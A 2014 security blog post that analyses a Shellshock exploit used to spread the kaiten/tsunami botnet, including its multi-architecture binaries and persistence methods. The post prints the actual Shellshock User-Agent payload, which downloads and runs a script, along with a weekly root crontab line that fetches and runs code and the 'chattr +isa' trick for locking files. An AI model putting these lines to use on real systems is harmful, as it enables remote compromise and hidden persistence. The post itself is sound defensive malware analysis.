Monday, October 6, 2014

Interesting Shellshock payload being used to spread "kaiten" botnet


This blog post brought to you in part by: MalwareMustDie. I must thank them for their assistance on this one.

Today, I came in and found around 300+ shellshock payloads. as I groggily looked through most of them, noting the same old vulnerability touches and payloads already documented in project OverWatch, I found an alert that caught my eye: threw this at me:
GET /nodeworx/ HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "curl -o /tmp/.a;fetch -o /tmp/.a;wget -O /tmp/.a;sh /tmp/.a;rm -rf /tmp/.a"

Awesome. A new toy to play with. Let's pull down the payload:


looks like it's a shell script. Reading through the script, reveals the following:

1) attempts to install gcc and php (both via yum or apt-get -- to ensure maximum spread across linux distros?)

2) adds as a DNS server in resolv.conf -- Level 3 communications public DNS server. Commonly used DNS server worldwide to ensure domain name resolution

3) appends the line "wget" to either /etc/rc.d/init.d/sshd or /etc/init.d/ssh

-- this file, "" is a persistence mechanism. It instructs the machine to compile a file downloaded from, a.c , into a binary in /tmp, execute it and delete it. This ensures persistence and if the source code is changed (say, to reflect a new CNC), the bot is updated.

4) several pre-compiled payloads of the same bot, for different platforms are downloaded and execution is attempted.  Additionally, the source file "a.c" is downloaded in this script, compiled, and executed

5) to further enable persistence, this line is added to root's crontab:
@weekly wget -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

Just like with the lines appended to ssh and sshd, this is a persistence mechanism. What's interesting is this line:

chattr +isa /var/spool/cron/tabs/root
+i makes the file immutable. This is a common persistence mechanism for penetration testers. The file cannot be deleted in any way until the +i flag is removed and because chattr (change attribute is so uncommon, most won't think to look for it or know how to remove it. Tip: lsattr allows you to list chattr attributes on a file.
+s ensures secure file deletion if the file is deleted.
+a allows the file to be appended to.

5) finally, a cron.weekly entry is made for "00logrotate" that performs the same actions as the weekly root crontab, and gets the same chattr +isa treatment.

What gets me is that these actors perform such great measures for persistence, but then COMPLETELY FAIL to protect the source code for their bot (zero obfuscation), fail to statically compile the bot in case required libs are NOT on the system, etc. Their loss is our gain.

Here are some links for the curious:

wget <-- main script
wget <-- persistence script
wget <-- kaiten bot source code
wget <-- x86_64 compilation
wget <-- ARM compilation
wget < -- MIPS compilation
wget <-- see below.. this one is fun.
wget <-- see below.. more fun!

I submitted the sha1sum of the file "b" to virustotal to see if it was already uploaded. Looks like someone beat me to the punch by a few hours:

VT mentions that this bot is known as kaiten/tsunami, no doubt in reference to the source code and/or tsunami ddos the bot can perform.

The arm/mips variants were a bit of a concern to me. This is one of the few times outside of the Zollard botnet I've seen variants of a bot precompiled for other CPU architectures -- arm and mips in this case.

It is worrying because while shellshock has been patched on a wide variety of major platforms, embedded devices and/or SOHO devices with the bash shell remain vulnerable to shellshock and likely will continue to remain vulnerable indefinitely in most cases.

I decided to consult with MMD on this case, as I recall hearing about Tsunami/Kaiten through them a while ago. It appears that this is commonplace for kaiten botnet and the source code is there to allow compilation on any platform. Additionally they made me aware of additional payloads the bot is capable of delivering for spreading deeper into targeted networks:

the dh file above is a variant of the shellshock over DHCP exploit that has already been seen via trustedsec as a perl module. If this were to be loaded on a SOHO device/router in a target network, the avenue for exploitation and pivoting deeper into a target network is much greater... if that device has a python interpreter.

the tmp.gz file is actually a tar.gz file. It contains pnscan, port scanner commonly packaged with DDOS bots. additionally this tarball contains bash.php, a php script that contains the initial exploit payload that points to via shellshock exploitation. If you want the payload, grab it now, I'm following up with the provider for that IP address to get this remediated as soon as possible.

The C source mentions I'm fairly certain this is the botnet CnC. or was. I couldn't connect to it via irssi. May need to detonate it later to confirm.

Happy Hunting,


1 comment:

  1. This technical post helps me to improve my skills set, thanks for this wonder article I expect your upcoming blog, so keep sharing..
    PHP Training Institute in Chennai